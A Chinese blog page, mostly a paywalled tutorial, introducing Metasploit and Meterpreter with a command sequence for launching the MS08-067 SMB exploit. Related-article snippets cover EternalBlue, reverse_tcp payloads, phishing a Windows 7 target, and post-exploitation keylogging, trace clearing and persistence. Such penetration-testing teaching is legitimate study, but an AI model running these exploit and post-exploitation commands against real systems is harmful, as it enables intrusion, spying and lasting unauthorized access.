详尽的msf——meterpreter——渗透测试教程

VIP文章 已于 2022-03-27 15:24:07 修改
阅读量2.7w 收藏 285
点赞数 43
分类专栏: 网络对抗工具 文章标签: 安全 web安全 msfconsole
于 2022-03-21 19:03:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42882717/article/details/123643133
版权

文章目录

详尽的msf——meterpreter——渗透测试教程

前言

本文仅供学习参考使用,切勿用于非法事情!!

众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。

现在发现msf很厉害,可以在它的基础上开发。

msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期控守(推塔)
我们可以在msfconsole上,开发自己的程序(用自己的英雄),程序可以利用msf中的模块(用它的装备)

msfconsole简介

Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。

查看源图像

五大模块:

渗透攻击(Exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。

攻击载荷(Payload),是我们期望目标系统在被渗透攻击之后去执行的代码。

Shellcode,是在渗透攻击是作为攻击载荷运行的一组机器指令,通常用汇编语言编写。

模块(Module),指Metasploit框架中所使用的一段软件代码组件,可用于发起渗透攻击或执行某些辅助攻击动作。

监听器(Listener),是Metasploit中用来等待网络连接的组件。

msfconsole使用方法——常用命令

直接使用并进行一次攻击

#初次使用:
service postgresql start     # 启动数据库服务
msfdb init             # 初始化数据库

#之后使用:
msfconsole             # 启动metasploit

#查看帮助选项
help 

#search - 查看漏洞:
search ms08_067

#use - 使用漏洞:
use exploit/windows/smb/ms08_067_netapi

#show - 查看可以攻击的靶机操作系统型号(targets):
show targets

#set - 设置target 参数(xx是对应被攻击靶机的型号):
set target xx

#set - 设置rhost参数(攻击靶机的ip地址):
set rhost 192.168.xxx.xxx

#show - 查看参数:
show options

#进行攻击:
exploit

具体参数可以查看帮助选项
help

image-20220321184655588

msfcon

最低0.47元/天 解锁文章
大瑞大
关注
  • 43
    点赞
  • 285
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
[ MSF ] Meterpreter扩展模块命令详解
msf 渗透测试
06-05
msf渗透
Msfconsole详细教程
最新发布
weixin_65582330的博客
03-05 1617
Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。选择架构平台:x86 | x64 | x86_64Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe。
Meterpreter命令详解
热门推荐
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
Metasploit Framework(MSF)基础框架
dzqxwzoe的博客
02-29 388
模块是通过Metasploit框架装载集成对外提供的最核心的渗透测试功能实现代码。MSF所有的漏洞测试都是基于模块。Metasploit 中有以下 7 种不同的模块类型模块名模块功能模块介绍auxiliary辅助模块辅助渗透(端口扫描、登录密码爆破、漏洞验证等)exploits漏洞利用模块包含主流的漏洞利用脚本,通常是对某些可能存在漏 洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类payloads攻击载荷模块。
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5546
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
渗透工具——kali中msf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 4714
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
MSF终端自动化脚本编写与使用
sGanYu
09-07 2491
Msfconsole内包含自动化脚本文件,一种可以在终端内按顺序执行的命令列表,该功能大大减少渗透测试所需的时间提高效率,将选择模块、设置参数运行等等任务进行自动化。
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5345
meterpreter使用攻略(持续更新中)
渗透测试神器-msf基础
qq_51796436的博客
12-01 5012
渗透测试在远控,权限维持阶段不可避免的要用到msf,在awd中也会经常用到,msf的功能不可谓不强大
meterpreter环境下的命令集
12-13
非常值的一个东西,就是你使用msf平台攻进靶机后的meterpreter下的所有命令集都有详细的讲解,非常好
meterpreter_bins:适用于 Windows 和 POSIX 的 Meterpreter Meterpreter 二进制文件
06-05
Meterpreter 二进制文件 该 gem 已被统一的“metasploit-payloads” gem 替换,该 gem 可在此处获得:
clr-meterpreterMeterpreter的CLR实现的完整故事
02-05
该存储库包含围绕打算在CLR上运行的Meterpreter的新实现的开发而产生的所有杂音和工件。 整个项目都在上进行直播,并在和存档。 有关此项目的基本原理,请参阅我的,并查看下面的第1部分。 这将花费很长时间,并且目前看不到太多东西! 从(完成时)到PR的存储库 完成后,这只是我自己的会计。 我需要记住我在修改过程中所做的事情。 metasploit-framework metasploit-payloads rex-arch 热衷于参与? 在我的页面的“建议”框中提交问题和评论(并在我最终成为会员时进行订阅)。 如果您有需要,可以随时在此回购中提交问题,但我希望使用建议框。
powershell-reverse-http:一个Powershell漏洞利用服务,可通过meterpreter打开反向HTTP连接
05-27
Powershell反向Http 注意:使用此程序需要您自担风险。 我不鼓励以任何方式非法使用该软件或未经其事先授权而攻击目标 类似Meterpreter的后门是一种非常常见的攻击媒介,大多数不错的防病毒软件都将这种行为检测为病毒。 一个在后台运行的简单Windows服务,该服务通过http与Meterpreter会话连接。 用法 首先,你需要为构建二进制(废话!)和接受反向的连接: git clone https://github.com/mauri870/powershell-reverse-http.git cd powershell-reverse-http env GOOS=windows go build -ldflags "-X main.LHOST=10.10.10.2 -X main.LPORT=3000" -o powershell-reverse.exe 更改
mettle:这是本机代码Meterpreter的实现,旨在实现可移植性,可嵌入性和低资源利用率
05-13
气概 这是本机代码Meterpreter的实现,旨在实现可移植性,可嵌入性和低资源利用率。 它可以在最大的嵌入式Linux目标上运行,并以Android,iOS,macOS,Linux和Windows为目标,但可以移植到几乎所有符合POSIX的环境。 在Linux上构建 Debain,Ubuntu和派生工具最受构建支持。 要进行构建,您至少需要5GB的可用磁盘空间,并且需要以下软件包: # Dependencies apt install curl build-essential git autoconf automake libtool bison flex gcc ruby rake bundler git mingw-w64 docker / Dockerfile下的Dockerfile也包含一个预配置的构建环境。 在macOS上构建 在macOS上,您需要按如下所示安装xcod
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架...下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
Metasploit渗透测试指南完整版-pdf
07-23
本电子书讲带你打开一扇新的大门,让你掌握神器msf的使用!!!!! Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供...
Metasploit渗透测试指南修订版》
09-12
Metasploit渗透测试指南修订版》新版修订版,相较于旧版补充更新了很多
meterpreter详细教程
06-09
MeterpreterMetasploit 框架中最常用的 payload(载荷)之一,它提供了一个强大的交互式 shell,可以用于远程控制受感染的主机。下面是一些关于 Meterpreter 的详细教程: 1. 获取 Meterpreter Shell 在 Metasploit 框架中选择一个适当的 exploit,成功获取目标机器的 shell 后,可以使用 Meterpreter payload,使用命令 `use payload/windows/meterpreter/reverse_tcp` 或 `use payload/linux/x86/meterpreter/reverse_tcp`。 2. 基本命令 Meterpreter 支持许多命令,可以使用 `help` 命令查看所有可用的命令。以下是一些常用命令: - `sysinfo`:显示目标系统的基本信息。 - `getuid`:显示当前用户的权限。 - `getsystem`:尝试提升当前用户的权限到系统管理员。 - `ps`:显示当前系统上正在运行的进程。 - `shell`:在目标机器上打开一个交互式 shell。 - `upload`:将本地文件上传到目标机器。 - `download`:将目标机器上的文件下载到本地。 3. 搜索敏感数据 Meterpreter 可以搜索目标机器上的敏感数据,例如密码和敏感文件。使用 `search` 命令,例如 `search -f password.txt`,可以搜索目标机器上所有包含 `password.txt` 的文件。 4. 捕获屏幕截图 Meterpreter 可以通过 `screenshot` 命令捕获目标机器的屏幕截图,并将其保存到攻击者的机器上。 5. 捕获键盘记录 Meterpreter 还可以通过 `keyscan_start` 和 `keyscan_dump` 命令捕获目标机器上的键盘记录。 6. 清除痕迹 Meterpreter 可以通过 `clean_up` 命令清除在目标机器上留下的痕迹,包括删除 Meterpreter 进程、清除日志文件等。 7. 持久化 Meterpreter 还可以通过 `run persistence` 命令在目标机器上创建一个持久化后门,以便攻击者可以在目标机器上保持访问权限。 以上是一些关于 Meterpreter 的基本教程,希望对您有所帮助。但请注意,任何未经授权的攻击行为都是违法的。如果您想学习网络安全,请遵守法律法规,不要进行任何非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值